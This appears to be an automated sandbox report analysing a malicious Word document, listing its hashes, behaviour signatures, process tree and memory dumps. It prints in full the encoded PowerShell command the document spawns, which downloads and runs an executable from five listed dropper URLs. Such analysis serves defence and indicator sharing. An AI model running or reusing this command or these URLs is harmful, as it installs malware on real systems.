Analysis

  • max time kernel
    136s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 21:13

General

  • Target

    6c462833bfb073ffa98832affbe51d79_JaffaCakes118.doc

  • Size

    199KB

  • MD5

    6c462833bfb073ffa98832affbe51d79

  • SHA1

    4e3d34c498534324c6c337958ef7afa8f901d32b

  • SHA256

    545d823a042629cbd1fb6b4874c344010f5d94d584dab152a4f3f54b2d83454b

  • SHA512

    b5c1305715eacd2337945e93ac4e4accef8ca08773cafc40d139213d2ec9cc9c3a65216c6103cfe64e675bb4d9fc18352ac3dd03f9cc6aa3feb888f4407cfb99

  • SSDEEP

    3072:Zx1Eru6nenAJB7BP7/nhZXKiNKDzaJFUKc0UTE7yZRUV7RJeOzi8e:ZHEy6nenAH7B7fXpEDzYUTE7yZRVUi8e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hamrahkar.com/7mYq2Q5

exe.dropper

http://duanhoalac.com/ESNeSYv

exe.dropper

http://envoyagemagazine.com/ZOyd7lN7PO

exe.dropper

http://gandamediasolutions.com/dDYg1QbPhF

exe.dropper

http://www.pabloteixeira.com/Oyr3bbN

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6c462833bfb073ffa98832affbe51d79_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABHADYAaQBzADMAWgBJAD0AKAAnAHQAbgA5ACcAKwAnAHUAdABtAGsAJwArACcARwAnACkAOwAkAHAAbQBQAGkANwBhAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAaQB0AGkAYQBiADYAagA9ACgAJwBoACcAKwAnAHQAdABwADoALwAvAGgAJwArACcAYQBtAHIAYQBoAGsAJwArACcAYQAnACsAJwByAC4AYwBvAG0ALwA3AG0AJwArACcAWQBxADIAUQA1AEAAaAB0AHQAcAA6AC8ALwBkAHUAYQAnACsAJwBuAGgAbwAnACsAJwBhACcAKwAnAGwAYQBjAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcALwBFAFMATgAnACsAJwBlAFMAJwArACcAWQB2AEAAaAB0AHQAcAA6AC8ALwBlAG4AdgBvAHkAJwArACcAYQAnACsAJwBnAGUAbQAnACsAJwBhAGcAJwArACcAYQB6AGkAbgBlAC4AYwBvAG0ALwBaAE8AeQBkADcAbABOADcAUABPAEAAJwArACcAaAAnACsAJwB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwBnAGEAbgBkAGEAJwArACcAbQAnACsAJwBlAGQAaQBhAHMAbwBsAHUAdABpAG8AbgBzAC4AYwBvAG0ALwBkAEQAJwArACcAWQAnACsAJwBnADEAJwArACcAUQBiAFAAaABGAEAAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwB3ACcAKwAnAHcAJwArACcAdwAuAHAAYQBiAGwAbwB0AGUAaQB4ACcAKwAnAGUAaQByAGEALgBjAG8AbQAvAE8AeQByADMAYgAnACsAJwBiACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAWQBwAG4AQQA4ADIAPQAoACcAWQBqAE0AJwArACcANQBrACcAKwAnAEEAUQAnACkAOwAkAHUARQBxAGgAQwAzADkAIAA9ACAAKAAnADMAOQAnACsAJwA3ACcAKQA7ACQAZgA0AFIANABIAEoAbAAxAD0AKAAnAFIAJwArACcARQA3ACcAKwAnADYAdQB6ACcAKQA7ACQAUQB2AHEAQgA0AEYAZAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAHUARQBxAGgAQwAzADkAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABNAHoAagB6ADIAagAgAGkAbgAgACQAYQBpAHQAaQBhAGIANgBqACkAewB0AHIAeQB7ACQAcABtAFAAaQA3AGEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATQB6AGoAegAyAGoALAAgACQAUQB2AHEAQgA0AEYAZAApADsAJABaADUAbAAxADEANQBvAE0APQAoACcAQwAnACsAJwA5AGkAJwArACcAVQBtAHcAaQBPACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAFEAdgBxAEIANABGAGQAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABRAHYAcQBCADQARgBkADsAJABjAGkAWgBIAFEANABKAD0AKAAnAE4ASwB3AHAAJwArACcAVQA1AEYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAWABPADYAYQBvAHoAbQA9ACgAJwBXACcAKwAnAEsAYQAnACsAJwBmADUAdgAnACkAOwA=
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3212

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD8F98.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltkiyuot.dro.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1976-7-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-572-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-4-0x00007FFB0416D000-0x00007FFB0416E000-memory.dmp

    Filesize

    4KB

  • memory/1976-1-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-8-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-9-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-6-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-10-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-20-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-12-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-11-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-13-0x00007FFAC1820000-0x00007FFAC1830000-memory.dmp

    Filesize

    64KB

  • memory/1976-15-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-16-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-17-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-14-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-19-0x00007FFAC1820000-0x00007FFAC1830000-memory.dmp

    Filesize

    64KB

  • memory/1976-18-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-0-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-5-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-3-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-43-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-45-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-574-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-37-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-38-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-573-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-68-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-2-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-519-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-547-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-548-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-549-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1976-570-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/1976-571-0x00007FFAC4150000-0x00007FFAC4160000-memory.dmp

    Filesize

    64KB

  • memory/3212-62-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3212-47-0x000001AC15290000-0x000001AC152B2000-memory.dmp

    Filesize

    136KB

  • memory/3212-46-0x00007FFB040D0000-0x00007FFB042C5000-memory.dmp

    Filesize

    2.0MB